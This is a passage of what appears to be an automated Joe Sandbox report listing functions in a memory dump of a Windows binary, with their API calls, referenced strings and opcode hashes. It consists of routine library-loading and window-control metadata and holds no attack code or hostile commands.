                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: BuffCharUpper$__itow__swprintf_memmove
                          • String ID: REMOVE$THIS
                          • API String ID: 2528338962-776492005
                          • Opcode ID: 690085ae8fd1bafbf45d13b87576f0f1f05bc9d800cacce7226082f1d5e4f8fd
                          • Instruction ID: c97ad06d378d1941b76af56bfb1107d7e981013621f3cc5694a42040de8dba2c
                          • Opcode Fuzzy Hash: 690085ae8fd1bafbf45d13b87576f0f1f05bc9d800cacce7226082f1d5e4f8fd
                          • Instruction Fuzzy Hash: 67415F75A00A099FCF25DF54C881AAEB7F5FF48314F0484A9E856AB392DB349E41DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B41050 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00B410EE
                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00B410FF
                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B41181
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorMode$AddressProc
                          • String ID: DllGetClassObject
                          • API String ID: 1548245697-1075368562
                          • Opcode ID: e3d878e46b93fdbdfe82aa8342d39b65951972f982d4610284eb4498faf2531e
                          • Instruction ID: b1128d38ded89b7009337286ca6c023717acae096cfbfbd1eb97a8dbfc09ad2c
                          • Opcode Fuzzy Hash: e3d878e46b93fdbdfe82aa8342d39b65951972f982d4610284eb4498faf2531e
                          • Instruction Fuzzy Hash: 89413C71A00204AFDB05DF58C884BAA7BF9EF44350F1488A9EA05EF255D7B1DA84DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                          Download Yara Rule
                          APIs
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B9DBF0,00000000,?,?,?,?), ref: 00B6A4E6
                          • GetWindowLongW.USER32 ref: 00B6A503
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B6A513
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long
                          • String ID: SysTreeView32
                          • API String ID: 847901565-1698111956
                          • Opcode ID: a6705c98c2380e43497699d602c3e3ecb0f5b1b414ca2f95098d07260dcba0a0
                          • Instruction ID: 580238b3aee5a623ebe760012689730e752979927b1503d0653e1d7097f8f52c
                          • Opcode Fuzzy Hash: a6705c98c2380e43497699d602c3e3ecb0f5b1b414ca2f95098d07260dcba0a0
                          • Instruction Fuzzy Hash: FD318D31200205ABDF219F38CC45BEA7BE9FB49328F244765F976A32E1DB74E8509B51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B69EE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B69F6B
                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B69F7F
                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B69FA3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$Window
                          • String ID: SysMonthCal32
                          • API String ID: 2326795674-1439706946
                          • Opcode ID: f80b372f9c70ea2a2ccabf1cb462faec812a00b5976fac296bf1f8505d325f41
                          • Instruction ID: 84add060756ab7f848ef4a55c643463fe5755610e86d64a5b01f19976d40e8a1
                          • Opcode Fuzzy Hash: f80b372f9c70ea2a2ccabf1cb462faec812a00b5976fac296bf1f8505d325f41
                          • Instruction Fuzzy Hash: 2B21AE32540218BBDF118F94CC82FEA3BB9EF59724F120254FA59AB1D0DAB5F850DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B6A74F
                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B6A75D
                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B6A764
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$DestroyWindow
                          • String ID: msctls_updown32
                          • API String ID: 4014797782-2298589950
                          • Opcode ID: 33072a0e12a80ca258cd05ef846d0e366baad4f9c498bcfe994ec0d3b643795b
                          • Instruction ID: 1ecc05d17eea029d93322c8391210613dcb52595f1c73b3b6e5d304f581434e0
                          • Opcode Fuzzy Hash: 33072a0e12a80ca258cd05ef846d0e366baad4f9c498bcfe994ec0d3b643795b
                          • Instruction Fuzzy Hash: 8F216575604205AFDB10DF68DCC1EB777EDEB4A794B140499F905AB252CB70EC11CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B697B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B6983D
                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B6984D
                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B69872
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$MoveWindow
                          • String ID: Listbox
                          • API String ID: 3315199576-2633736733
                          • Opcode ID: 241e2032e29ca29aeaacab33a0c73e571084296b9c546d74984feb43c42603b2
                          • Instruction ID: 0b2fc914b3904706217d9c628d289c46ff67a8634892e72bd13ec4f08a069c9f
                          • Opcode Fuzzy Hash: 241e2032e29ca29aeaacab33a0c73e571084296b9c546d74984feb43c42603b2
                          • Instruction Fuzzy Hash: 9221C232610118BFEB118F54CC85FBB3BEEEF8A794F118164F9149B1A0CA759C518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6A217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B6A27B
                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B6A290
                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B6A29D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: msctls_trackbar32
                          • API String ID: 3850602802-1010561917
                          • Opcode ID: 952e0f4fda916e922665bafeae1cf0065b573b380a446e8064f2608ad2f2d548
                          • Instruction ID: 17fffbaecd46484277dcf7db32c86a84ceed3b581537092f747ba8221390fe0d
                          • Opcode Fuzzy Hash: 952e0f4fda916e922665bafeae1cf0065b573b380a446e8064f2608ad2f2d548
                          • Instruction Fuzzy Hash: 7E110171280208BBEF205F65CC46FE73BA8EF89B14F114118FA45A60D0D676A851CB20
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B23034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B22F4E), ref: 00B2304E
                          • GetProcAddress.KERNEL32(00000000), ref: 00B23055
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 2574300362-2819208100
                          • Opcode ID: 260da3b62b1e80abb8b1f12329ed20d800e3206b22c11242d18107ea6cf3c7f3
                          • Instruction ID: 6766d4c66f88fb12902a7af3cd29edad481ce7723a8514e0005aa4154ebf755e
                          • Opcode Fuzzy Hash: 260da3b62b1e80abb8b1f12329ed20d800e3206b22c11242d18107ea6cf3c7f3
                          • Instruction Fuzzy Hash: 01E09270A64204EFDB207FA1ED0DF057AA4B708B02F140599F209B30F0CFB88500CB14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B620F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B620EC,?,00B5F751), ref: 00B62104
                          • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00B62116
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetProcessId$kernel32.dll
                          • API String ID: 2574300362-399901964
                          • Opcode ID: e9a89727239f46acee35828ba855381a97565625d935ec9bd7aabbd4c2542590
                          • Instruction ID: f1ed91587fc5a1edc5d4294d421fe1c104bb04d0e405c5805b6cd582ec88624f
                          • Opcode Fuzzy Hash: e9a89727239f46acee35828ba855381a97565625d935ec9bd7aabbd4c2542590
                          • Instruction Fuzzy Hash: 30D0A734414B129FE7306F61E80D75237D4EF04700B00449AEA59F21B5DBB4C480CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B413A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00B41371,?,00B41519), ref: 00B413B4
                          • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00B413C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1587604923
                          • Opcode ID: f15b3899e23da82d063ea8f364168d6187e3043d79934274d6c8cb6ce4a06a9d
                          • Instruction ID: b790e9a94d8fb792125c6e7e5e50d797a97760d49be0f6045b63f7241883e278
                          • Opcode Fuzzy Hash: f15b3899e23da82d063ea8f364168d6187e3043d79934274d6c8cb6ce4a06a9d
                          • Instruction Fuzzy Hash: 2BD05E31804712ABD7212F28A84875137E8AF40704B00489AE456A25B0EAB0C480C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B4137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(oleaut32.dll,?,00B4135F,?,00B41440), ref: 00B41389
                          • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00B4139B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegisterTypeLibForUser$oleaut32.dll
                          • API String ID: 2574300362-1071820185
                          • Opcode ID: 0fbea33d04a0acc3a5faf598c4fe33c9cd17b83050f0dd65630d4423b1cf3185
                          • Instruction ID: 1c48fabc8a5c00a88fd6d69a9575caa4d65ef23928a37d111ee5520c92fb7b08
                          • Opcode Fuzzy Hash: 0fbea33d04a0acc3a5faf598c4fe33c9cd17b83050f0dd65630d4423b1cf3185
                          • Instruction Fuzzy Hash: DDD0A730C00712BFD7202F28EC4C79137D4EF04B04F44489AE485E29B0DAB0D5C0D714
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B1E69C,?,00B1E43F), ref: 00B1E6B4
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B1E6C6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetNativeSystemInfo$kernel32.dll
                          • API String ID: 2574300362-192647395
                          • Opcode ID: f938473b66c87a0a5f52d0acb223aec1107d9d9f732444c15a924d7c3bf9d96d
                          • Instruction ID: d735da7ed5fd96e267ea5d163b4a6d45ecd4182a7b5a13e1e68ffe95cc613fb8
                          • Opcode Fuzzy Hash: f938473b66c87a0a5f52d0acb223aec1107d9d9f732444c15a924d7c3bf9d96d
                          • Instruction Fuzzy Hash: BAD0A7344003129FD7216F31E80C79237D4EF24701B80549AE855E31B0DBB0C4C0C710
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B1E6D9,0000000C,00B1E55B,00B9DC28,?,?), ref: 00B1E6F1
                          • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00B1E703
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsWow64Process$kernel32.dll
                          • API String ID: 2574300362-3024904723
                          • Opcode ID: 4d70899e0bae29aef3b6e5d910f783b20d7c27b0e710b975920c0b19927330f6
                          • Instruction ID: 9e25dc8d2655ad047555b4ac58d6995e09ebb74e23a2e1f722b8ad08134ed35a
                          • Opcode Fuzzy Hash: 4d70899e0bae29aef3b6e5d910f783b20d7c27b0e710b975920c0b19927330f6
                          • Instruction Fuzzy Hash: 76D05234400312ABE7243B22A88CB933BE8AF05700B4045AAE8A5A22E0DAB0D880CB10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B63ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00B63AC2,?,00B629F5), ref: 00B63ADA
                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B63AEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: RegDeleteKeyExW$advapi32.dll
                          • API String ID: 2574300362-4033151799
                          • Opcode ID: eca737a429469a35bf908148e3d9ba0d51deab0a51d7145a20f742dd86cd6fb9
                          • Instruction ID: 8a4061c51dae09e51abd27338ea6b2d468be12c7745f487957b10cb8bbbe88fe
                          • Opcode Fuzzy Hash: eca737a429469a35bf908148e3d9ba0d51deab0a51d7145a20f742dd86cd6fb9
                          • Instruction Fuzzy Hash: 32D09E705107239FD7205B65A84D79577D4AF15B15B10849EE499A26A0EFF4C880C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5EBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,00B5EBAF,?,00B5EAAC), ref: 00B5EBC7
                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00B5EBD9
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
